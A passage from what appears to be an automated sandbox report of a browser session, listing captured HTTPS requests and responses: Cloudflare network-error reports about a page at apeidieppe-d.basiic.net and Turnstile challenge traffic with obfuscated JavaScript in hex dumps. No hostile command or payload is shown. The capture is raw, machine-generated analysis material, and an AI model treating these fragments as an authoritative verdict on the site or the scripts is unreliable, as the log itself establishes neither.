31 31 39 38 29 5d 2c 27 5f 27 29 2c 30
                                                                                                                  Data Ascii: ]=!0),M=D+L,Object[jQ(1045)][jQ(513)][jQ(497)](B,M))D=M;else{if(Object[jQ(1045)][jQ(513)][jQ(497)](C,D)){if(d[jQ(1161)]!==jQ(1351)){if(256>D[jQ(1200)](0)){if(d[jQ(1258)](d[jQ(666)],jQ(911))){for(T,Q=32,S=d[jQ(1114)](d[jQ(1015)](j[jQ(586)][jQ(1198)],'_'),0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  66192.168.2.164982035.190.80.14432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:23 UTC562OUTOPTIONS /report/v4?s=94LAg2WpngPxh8V8opwdSyAa7XvKNFcqbdikRbaDDi6yq7cOnk8nOLZDwSZp4tei%2B31zGJIcUzuPQsLLPbRr%2FS%2F0tl6XmahvtkHxsCyT5F%2FVyECHWIcWgBUqP0P5ei2ovb2%2BT5S6Sbe1jA%3D%3D HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:23 UTC336INHTTP/1.1 200 OK
                                                                                                                  Content-Length: 0
                                                                                                                  access-control-max-age: 86400
                                                                                                                  access-control-allow-methods: OPTIONS, POST
                                                                                                                  access-control-allow-origin: *
                                                                                                                  access-control-allow-headers: content-type, content-length
                                                                                                                  date: Tue, 22 Oct 2024 14:09:23 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  67192.168.2.164982135.190.80.14432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:23 UTC543OUTOPTIONS /report/v4?s=HHi8xveK8X3zmjMMsaI56NaBRpVCFoAEI9CfpJtWHkJs%2FZ3%2Fhj3qYWd5bZ43HQqp1itDOxLLbyV2vXma0KU%2BZ3rKc0yO7GDIXr21tncTbAQDlZoC3YLubCZFuGgHqWul4GHFUHsb HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Origin: https://cdnjs.cloudflare.com
                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:23 UTC336INHTTP/1.1 200 OK
                                                                                                                  Content-Length: 0
                                                                                                                  access-control-max-age: 86400
                                                                                                                  access-control-allow-methods: OPTIONS, POST
                                                                                                                  access-control-allow-origin: *
                                                                                                                  access-control-allow-headers: content-length, content-type
                                                                                                                  date: Tue, 22 Oct 2024 14:09:23 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  68192.168.2.164982235.190.80.14432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:24 UTC496OUTPOST /report/v4?s=94LAg2WpngPxh8V8opwdSyAa7XvKNFcqbdikRbaDDi6yq7cOnk8nOLZDwSZp4tei%2B31zGJIcUzuPQsLLPbRr%2FS%2F0tl6XmahvtkHxsCyT5F%2FVyECHWIcWgBUqP0P5ei2ovb2%2BT5S6Sbe1jA%3D%3D HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 423
                                                                                                                  Content-Type: application/reports+json
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:24 UTC423OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 37 39 32 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 30 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 65 69 64 69 65 70 70 65 2d 64 2e
                                                                                                                  Data Ascii: [{"age":37923,"body":{"elapsed_time":403,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://apeidieppe-d.
                                                                                                                  2024-10-22 14:09:24 UTC168INHTTP/1.1 200 OK
                                                                                                                  Content-Length: 0
                                                                                                                  date: Tue, 22 Oct 2024 14:09:24 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  69192.168.2.164982335.190.80.14432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:24 UTC480OUTPOST /report/v4?s=HHi8xveK8X3zmjMMsaI56NaBRpVCFoAEI9CfpJtWHkJs%2FZ3%2Fhj3qYWd5bZ43HQqp1itDOxLLbyV2vXma0KU%2BZ3rKc0yO7GDIXr21tncTbAQDlZoC3YLubCZFuGgHqWul4GHFUHsb HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 477
                                                                                                                  Content-Type: application/reports+json
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:24 UTC477OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 33 36 37 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 35 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 70 6f 70 70 65 72 2e 6a 73 2f 31 2e 31 32 2e 39 2f 75 6d 64 2f 70 6f 70 70 65 72 2e 6d 69 6e 2e 6a 73 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 31 37 2e 32 34 2e 31 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34
                                                                                                                  Data Ascii: [{"age":43676,"body":{"elapsed_time":155,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js","sampling_fraction":1.0,"server_ip":"104.17.24.14","status_code":404
                                                                                                                  2024-10-22 14:09:24 UTC168INHTTP/1.1 200 OK
                                                                                                                  Content-Length: 0
                                                                                                                  date: Tue, 22 Oct 2024 14:09:24 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  70192.168.2.1649824104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:25 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a109478696b9a&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:25 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:25 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 115766
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a10a4a8dd6c80-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:25 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22
                                                                                                                  Data Ascii: nger%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only":"Testing%20only.","turnstile_footer_terms":"Terms","turnstile_expired"
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 37 31 37 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 36 38 33 29 29 2f 38 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 34 34 35 38 33 34 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 37 34 39 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4d 3d 67 4c 2c 64 3d 7b 27 63 6e 52 4a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 51 49 52 67 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69
                                                                                                                  Data Ascii: ))/6+-parseInt(gK(717))/7+parseInt(gK(683))/8,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,445834),eM=this||self,eN=eM[gL(749)],eO=function(gM,d,e,f,g){return gM=gL,d={'cnRJc':function(h,i){return h+i},'QIRgm':function(h,i){return h(i
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4d 28 35 34 30 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4e 29 7b 72 65 74 75 72 6e 20 67 4e 3d 62 2c 67 4e 28 31 30 33 33 29 5b 67 4e 28 31 35 30 30 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 4f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 67 4f 3d 67 4d 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47
                                                                                                                  Data Ascii: nction(h,i){return h===i}},e=String[gM(540)],f={'h':function(h){return h==null?'':f.g(h,6,function(i,gN){return gN=b,gN(1033)[gN(1500)](i)})},'g':function(i,j,o,gO,s,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O){if(gO=gM,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 4f 28 35 35 34 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 67 4f 28 36 35 38 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 67 4f 28 31 30 35 37 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 4f 28 31 36 39 36 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 67 4f 28 36 35 38 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 67 4f 28 31 32 39 31 29 5d 28 48 3c 3c 31 2c 4f 26 31 29 2c 64 5b 67 4f 28 38 34 35 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4f 28 31 36 39 36 29 5d 28 64 5b 67 4f 28 31 31 35 31 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 64
                                                                                                                  Data Ascii: O(554)](B,C)){if(256>C[gO(658)](0)){for(s=0;d[gO(1057)](s,F);H<<=1,j-1==I?(I=0,G[gO(1696)](o(H)),H=0):I++,s++);for(O=C[gO(658)](0),s=0;8>s;H=d[gO(1291)](H<<1,O&1),d[gO(845)](I,j-1)?(I=0,G[gO(1696)](d[gO(1151)](o,H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;d
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 29 2c 4b 3e 3e 3d 31 2c 64 5b 67 52 28 31 36 32 36 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 67 52 28 31 32 30 31 29 5d 28 64 5b 67 52 28 39 35 36 29 5d 28 30 2c 4f 29 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 29 3b 73 77 69 74 63 68 28 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 67 52 28 31 31 30 30 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 64 5b 67 52 28 39 32 30 29 5d 28 49 2c 4e 29 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31 2c 64 5b 67 52 28 37 32 36 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 67 52 28 33 37 35 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 67 52 28 31 32 30 31 29 5d 28 30 3c 4f 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 50 3d 65 28 4d 29 3b 62 72 65 61 6b 3b
                                                                                                                  Data Ascii: ),K>>=1,d[gR(1626)](0,K)&&(K=o,J=s(L++)),M|=d[gR(1201)](d[gR(956)](0,O)?1:0,I),I<<=1));switch(M){case 0:for(M=0,N=Math[gR(1100)](2,8),I=1;d[gR(920)](I,N);O=J&K,K>>=1,d[gR(726)](0,K)&&(K=o,J=d[gR(375)](s,L++)),M|=d[gR(1201)](0<O?1:0,I),I<<=1);P=e(M);break;
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 28 39 30 36 29 5d 28 31 65 33 2c 65 4d 5b 67 53 28 31 37 31 31 29 5d 5b 67 53 28 36 37 36 29 5d 28 32 2e 36 3c 3c 66 2c 33 32 29 29 2c 65 4d 5b 67 53 28 37 39 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 54 29 7b 69 66 28 67 54 3d 67 53 2c 67 54 28 38 34 31 29 3d 3d 3d 65 5b 67 54 28 31 32 32 31 29 5d 29 72 65 74 75 72 6e 3b 65 6c 73 65 20 65 4d 5b 67 54 28 35 31 34 29 5d 26 26 28 65 4d 5b 67 54 28 31 36 39 34 29 5d 5b 67 54 28 31 30 33 35 29 5d 28 29 2c 65 4d 5b 67 54 28 31 36 39 34 29 5d 5b 67 54 28 37 31 35 29 5d 28 29 2c 65 4d 5b 67 54 28 31 33 34 36 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 67 54 28 39 30 39 29 5d 5d 5b 67 54 28 31 30 33 36 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 67 54 28 35 36 35 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 67
                                                                                                                  Data Ascii: (906)](1e3,eM[gS(1711)][gS(676)](2.6<<f,32)),eM[gS(794)](function(gT){if(gT=gS,gT(841)===e[gT(1221)])return;else eM[gT(514)]&&(eM[gT(1694)][gT(1035)](),eM[gT(1694)][gT(715)](),eM[gT(1346)]=!![],eM[e[gT(909)]][gT(1036)]({'source':e[gT(565)],'widgetId':eM[g
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 31 35 37 29 5d 29 3b 69 66 28 6b 3d 68 7c 7c 67 55 28 36 30 30 29 2c 6c 3d 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 31 30 39 32 29 5d 3f 69 5b 67 55 28 38 34 34 29 5d 28 69 5b 67 55 28 38 34 39 29 5d 28 27 68 2f 27 2c 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 31 30 39 32 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 67 55 28 35 32 38 29 5d 28 69 5b 67 55 28 37 30 38 29 5d 2b 6c 2b 67 55 28 31 30 33 38 29 2b 31 2c 67 55 28 31 34 39 31 29 29 2b 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 31 33 34 33 29 5d 2b 27 2f 27 2b 65 4d 5b 67 55 28 33 39 35 29 5d 2e 63 48 2b 27 2f 27 2b 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 38 37 37 29 5d 2c 6e 3d 7b 7d 2c 6e 5b 67 55 28 36 30 36 29 5d 3d 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 36 30 36 29 5d 2c
                                                                                                                  Data Ascii: 157)]);if(k=h||gU(600),l=eM[gU(395)][gU(1092)]?i[gU(844)](i[gU(849)]('h/',eM[gU(395)][gU(1092)]),'/'):'',m=i[gU(528)](i[gU(708)]+l+gU(1038)+1,gU(1491))+eM[gU(395)][gU(1343)]+'/'+eM[gU(395)].cH+'/'+eM[gU(395)][gU(877)],n={},n[gU(606)]=eM[gU(395)][gU(606)],
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 3d 7b 7d 2c 6e 5b 67 58 28 31 36 33 38 29 5d 3d 65 2c 6e 5b 67 58 28 34 39 32 29 5d 3d 66 2c 6e 5b 67 58 28 31 35 30 32 29 5d 3d 67 2c 6e 5b 67 58 28 31 35 38 39 29 5d 3d 68 2c 6e 5b 67 58 28 31 31 35 37 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 67 58 28 37 39 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 5a 29 7b 67 5a 3d 67 58 2c 65 4d 5b 67 5a 28 36 35 32 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6d 5b 67 5a 28 31 36 32 39 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 67 58 28 37 39 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 30 29 7b 68 30 3d 67 58 2c 65 4d 5b 68 30 28 37 38 32 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 67 58 28 31 32 38 36 29 5d 5b 67 58 28 31 32 34 38 29 5d 28 67 58 28 35 36 31 29 2c 65 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 73 3d
                                                                                                                  Data Ascii: ={},n[gX(1638)]=e,n[gX(492)]=f,n[gX(1502)]=g,n[gX(1589)]=h,n[gX(1157)]=i,o=n,eM[gX(794)](function(gZ){gZ=gX,eM[gZ(652)](o,undefined,m[gZ(1629)])},10),eM[gX(794)](function(h0){h0=gX,eM[h0(782)]()},1e3),eM[gX(1286)][gX(1248)](gX(561),e));continue;case'2':s=
                                                                                                                  2024-10-22 14:09:25 UTC1369INData Raw: 63 5b 69 77 28 33 39 31 29 5d 28 66 62 29 7d 2c 31 65 33 29 29 2c 66 56 3d 7b 7d 2c 66 56 5b 67 4c 28 31 31 38 32 29 5d 3d 21 5b 5d 2c 66 56 5b 67 4c 28 34 37 34 29 5d 3d 65 55 2c 66 56 5b 67 4c 28 38 37 39 29 5d 3d 66 4a 2c 66 56 5b 67 4c 28 39 30 38 29 5d 3d 66 4f 2c 66 56 5b 67 4c 28 37 31 39 29 5d 3d 66 50 2c 66 56 5b 67 4c 28 37 31 35 29 5d 3d 66 4b 2c 66 56 5b 67 4c 28 38 32 34 29 5d 3d 66 51 2c 66 56 5b 67 4c 28 31 31 35 35 29 5d 3d 66 4e 2c 66 56 5b 67 4c 28 31 36 35 39 29 5d 3d 66 4d 2c 66 56 5b 67 4c 28 31 34 38 31 29 5d 3d 66 38 2c 66 56 5b 67 4c 28 31 32 32 36 29 5d 3d 66 49 2c 66 56 5b 67 4c 28 31 32 31 38 29 5d 3d 66 48 2c 66 56 5b 67 4c 28 31 30 37 39 29 5d 3d 65 5a 2c 66 56 5b 67 4c 28 35 34 34 29 5d 3d 66 30 2c 66 56 5b 67 4c 28 35 36 39
                                                                                                                  Data Ascii: c[iw(391)](fb)},1e3)),fV={},fV[gL(1182)]=![],fV[gL(474)]=eU,fV[gL(879)]=fJ,fV[gL(908)]=fO,fV[gL(719)]=fP,fV[gL(715)]=fK,fV[gL(824)]=fQ,fV[gL(1155)]=fN,fV[gL(1659)]=fM,fV[gL(1481)]=f8,fV[gL(1226)]=fI,fV[gL(1218)]=fH,fV[gL(1079)]=eZ,fV[gL(544)]=f0,fV[gL(569


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  71192.168.2.1649826104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:27 UTC1164OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/407986847:1729602762:c27s0J1i_yGWQGhtK4zEbOI0mjk8eSNl9_miAkRqE4c/8d6a109478696b9a/7X8xLq0x65Hefl7XIbL4WxPG.shgx0baSjW4_h4Bbh0-1729606162-1.1.1.1-UR9n5bDiLvnhFsbmxB2BU5VTfL0QYVz8g7ESgTGAf9foIjVtjOq2AmmZbXoxC_o4 HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 3288
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: 7X8xLq0x65Hefl7XIbL4WxPG.shgx0baSjW4_h4Bbh0-1729606162-1.1.1.1-UR9n5bDiLvnhFsbmxB2BU5VTfL0QYVz8g7ESgTGAf9foIjVtjOq2AmmZbXoxC_o4
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv1/bpy9ZfXXCgwSaYHz/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
